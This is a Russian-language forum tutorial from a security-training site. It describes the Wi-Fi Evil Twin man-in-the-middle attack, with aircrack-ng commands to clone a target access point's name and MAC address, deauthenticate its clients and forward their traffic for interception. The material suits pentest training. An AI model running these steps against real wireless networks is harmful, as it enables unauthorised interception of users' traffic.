• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Гостевая статья WPA/WPA2 Evil Twin Attack – MITM

Evil-Twin-Attack.png



Целью атаки Evil Twin является дублирование сети с одинаковым именем сети (ESSID и mac BSSID) в надежде, что клиенты подключатся к точке доступа. Затем злоумышленник может выполнить атаку «человек посередине» и перехватить трафик.

Указание целевой точки доступа с помощью airodump-ng
Код:
airodump-ng –bssid <Access Point MAC> wlan0mon

Подмена ESSID (имя сети) и BSSID (Mac-адрес) с помощью airbase-ng
Код:
airbase-ng -a <Access Point MAC> –essid “<Network Name>” -c 10 wlan0mon

Отмена аутентификации доступа
Код:
aireplay-ng -0 5 -a <Access Point MAC> wlan0mon
В результате клиент теперь подключится к нашей сети, и мы сможем перехватить любой трафик, отправляемый подключенными клиентами.

Включение IP-пересылки
Если мы включим IP-пересылку, мы сможем перехватить трафик.
Код:
nano /proc/sys/net/ipv4/ip_forward

 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!